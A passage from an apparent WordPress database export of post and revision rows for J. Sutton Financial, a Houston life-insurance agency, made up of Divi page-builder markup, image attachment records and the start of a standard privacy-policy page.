width_phone=\"50%\" width_last_edited=\"on|desktop\" module_alignment=\"right\" custom_margin=\"||||false|false\" custom_margin_tablet=\"|37px||89px|false|false\" custom_margin_phone=\"|0px||0px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"33px|1px||||\" custom_padding_tablet=\"33px|1px||||\" custom_padding_phone=\"0px|0px|||false|false\" custom_padding_last_edited=\"on|phone\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" hover_enabled=\"0\" module_alignment_tablet=\"center\" module_alignment_phone=\"center\" module_alignment_last_edited=\"on|desktop\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" header_2_text_align=\"center\" header_2_text_color=\"#000000\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" always_center_on_mobile=\"off\" _builder_version=\"4.20.4\" _module_preset=\"default\" width=\"70%\" width_tablet=\"70%\" width_phone=\"50%\" width_last_edited=\"on|desktop\" module_alignment=\"left\" custom_margin=\"|||0px||\" custom_margin_tablet=\"|||0px||\" custom_margin_phone=\"|||0px||\" custom_margin_last_edited=\"on|desktop\" custom_padding=\"|||0px||\" animation_direction=\"left\" hover_enabled=\"0\" module_alignment_tablet=\"center\" module_alignment_phone=\"center\" module_alignment_last_edited=\"on|phone\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" width_tablet=\"75%\" width_phone=\"75%\" width_last_edited=\"on|phone\" module_alignment=\"center\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','publish','closed','closed','','home','','','2023-04-11 21:38:14','2023-04-11 21:38:14','',0,'http://cmdev-site1.com/?page_id=138',0,'page','',0),(139,1,'2023-03-03 16:17:49','2023-03-03 16:17:49','','Auto Draft','','inherit','closed','closed','','138-revision-v1','','','2023-03-03 16:17:49','2023-03-03 16:17:49','',138,'http://cmdev-site1.com/?p=139',0,'revision','',0),(471,3,'2023-03-23 12:24:33','2023-03-23 12:24:33','','Contract Icon Grey Background','','inherit','open','closed','','contract-icon-grey-background','','','2023-03-26 19:20:54','2023-03-26 19:20:54','',0,'http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png',0,'attachment','image/png',0),(472,3,'2023-03-23 12:25:23','2023-03-23 12:25:23','','People Icon','','inherit','open','closed','','people-icon','','','2023-03-26 19:20:41','2023-03-26 19:20:41','',0,'http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png',0,'attachment','image/png',0),(473,3,'2023-03-23 12:25:51','2023-03-23 12:25:51','','Shaking Hands Icon No Background Hex 666666','','inherit','open','closed','','shaking-hands-icon-no-background-hex-666666','','','2023-03-26 19:20:59','2023-03-26 19:20:59','',0,'http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666.jpg',0,'attachment','image/jpeg',0),(474,3,'2023-03-23 12:26:45','2023-03-23 12:26:45','','Thought Bubbles','','inherit','open','closed','','thought-bubbles','','','2023-03-26 19:21:06','2023-03-26 19:21:06','',0,'http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png',0,'attachment','image/png',0),(200,1,'2023-03-08 12:47:38','2023-03-08 12:47:38','','Home - 2','','inherit','closed','closed','','138-revision-v1','','','2023-03-08 12:47:38','2023-03-08 12:47:38','',138,'http://cmdev-site1.com/?p=200',0,'revision','',0),(201,1,'2023-03-08 13:00:25','2023-03-08 13:00:25','[et_pb_section][et_pb_row][et_pb_column type=\"4_4\"][et_pb_text]\r\n\r\n[caption id=\"attachment_163\" align=\"aligncenter\" width=\"1024\"]<img class=\"size-large wp-image-163\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/New-Website-Header-No-Verbage-1024x666.jpg\" alt=\"\" width=\"1024\" height=\"666\" /> Little child playing superhero. Kid on the background of bright blue wall. Girl power concept. Yellow, pink and turquoise colors.[/caption]\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home - 2','','inherit','closed','closed','','138-revision-v1','','','2023-03-08 13:00:25','2023-03-08 13:00:25','',138,'http://cmdev-site1.com/?p=201',0,'revision','',0),(141,1,'2023-03-03 16:19:34','2023-03-03 16:19:34','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\"][et_pb_row admin_label=\"row\" _builder_version=\"4.16\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_blog _builder_version=\"4.20.0\" _module_preset=\"default\" posts_number=\"3\" include_categories=\"all\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section]','Auto Draft','','inherit','closed','closed','','138-revision-v1','','','2023-03-03 16:19:34','2023-03-03 16:19:34','',138,'http://cmdev-site1.com/?p=141',0,'revision','',0),(142,1,'2023-03-03 16:19:37','2023-03-03 16:19:37','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\"][et_pb_row admin_label=\"row\" _builder_version=\"4.16\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_blog _builder_version=\"4.20.0\" _module_preset=\"default\" posts_number=\"3\" include_categories=\"all\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section]','Home - 2','','inherit','closed','closed','','138-revision-v1','','','2023-03-03 16:19:37','2023-03-03 16:19:37','',138,'http://cmdev-site1.com/?p=142',0,'revision','',0),(143,1,'2023-03-03 16:19:46','2023-03-03 16:19:46','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\"][et_pb_row admin_label=\"row\" _builder_version=\"4.16\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_blog posts_number=\"3\" include_categories=\"all\" _builder_version=\"4.20.0\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section]','Home - 2','','inherit','closed','closed','','138-revision-v1','','','2023-03-03 16:19:46','2023-03-03 16:19:46','',138,'http://cmdev-site1.com/?p=143',0,'revision','',0),(484,3,'2023-03-23 16:41:11','2023-03-23 16:41:11','{\n    \"site_icon\": {\n        \"value\": 482,\n        \"type\": \"option\",\n        \"user_id\": 3,\n        \"date_modified_gmt\": \"2023-03-23 16:41:11\"\n    }\n}','','','trash','closed','closed','','c99ef9b2-b75c-4424-94da-84e97647b72d','','','2023-03-23 16:41:11','2023-03-23 16:41:11','',0,'http://cmdev-site1.com/2023/03/23/c99ef9b2-b75c-4424-94da-84e97647b72d/',0,'customize_changeset','',0),(624,1,'2023-04-02 19:15:56','2023-04-02 19:15:56','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">J. Sutton Financial, an Independent Agency for American Income Life Insurance Company </span></h1>[/et_pb_text][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" text_orientation=\"center\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url,button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" hover_enabled=\"0\" global_colors_info=\"{}\" animation_direction=\"left\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(224,219,219,0.39)\" custom_margin=\"77px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"99.9%\" custom_margin=\"|-14px||||\" custom_padding=\"8px||0px|||\" global_colors_info=\"{}\"]<h2><strong>Looking for a New Career? Learn How Arias Can Help Grow Your Future.</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_style=\"bounce\" hover_enabled=\"0\" global_colors_info=\"{}\" animation_direction=\"left\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_text_color=\"#FFFFFF\" header_2_text_color=\"#FFFFFF\" custom_margin=\"30px||||false|false\" custom_padding=\"148px||66px||false|false\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Proudly Headquartered in Houston, Texas</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on||||dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" background_layout=\"dark\" min_height=\"24.8px\" custom_margin=\"||66px|||\" link_option_url_new_window=\"on\" global_colors_info=\"{}\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/insurance-quote/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-02 19:15:56','2023-04-02 19:15:56','',138,'http://cmdev-site1.com/?p=624',0,'revision','',0),(560,3,'2023-04-01 14:10:07','2023-04-01 14:10:07','<!-- wp:heading -->\r\n<h2>Who we are</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Our website address is: <a href=\"https://www.jsuttonfinancial.com/\" target=\"_blank\" rel=\"noopener\">https://www.jsuttonfinancial.com/</a>.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Comments</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>When visitors leave comments on the site, we collect the data shown in the comments form and the visitor’s IP address and browser user agent string to help spam detection.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>An anonymized string created from your email address (also called a hash) may be provided to the Gravatar service to see if you are using it. The Gravatar service privacy policy is available here: https://automattic.com/privacy/. After approval of your comment, your profile picture is visible to the public in the context of your comment.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Media</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you upload images to the website, you should avoid uploading images with embedded location data (EXIF GPS) included. Visitors to the website can download and extract any location data from images on the website.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Cookies</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you leave a comment on our site, you may opt-in to saving your name, email address and website in cookies. These are for your convenience so that you do not have to fill in your details again when you leave another comment. These cookies will last for one year.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you visit our login page, we will set a temporary cookie to determine if your browser accepts cookies. This cookie contains no personal data and is discarded when you close your browser.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>When you log in, we will also set up several cookies to save your login information and your screen display choices. Login cookies last for two days, and screen options cookies last for a year. If you select \"Remember Me,\" your login will persist for two weeks. If you log out of your account, the login cookies will be removed.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you edit or publish an article, an additional cookie will be saved in your browser. This cookie includes no personal data and simply indicates the post ID of the article you just edited. It expires after 1 day.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Embedded content from other websites</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Articles on this site may include embedded content (e.g., videos, images, articles, etc.). Embedded content from other websites behaves in the exact same way as if the visitor has visited the other website.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>These websites may collect data about you, use cookies, embed additional third-party tracking, and monitor your interaction with that embedded content, including tracking your interaction with the embedded content if you have an account and are logged in to that website.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Who we share your data with</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you request a password reset, your IP address will be included in the reset email.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>How long we retain your data</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- 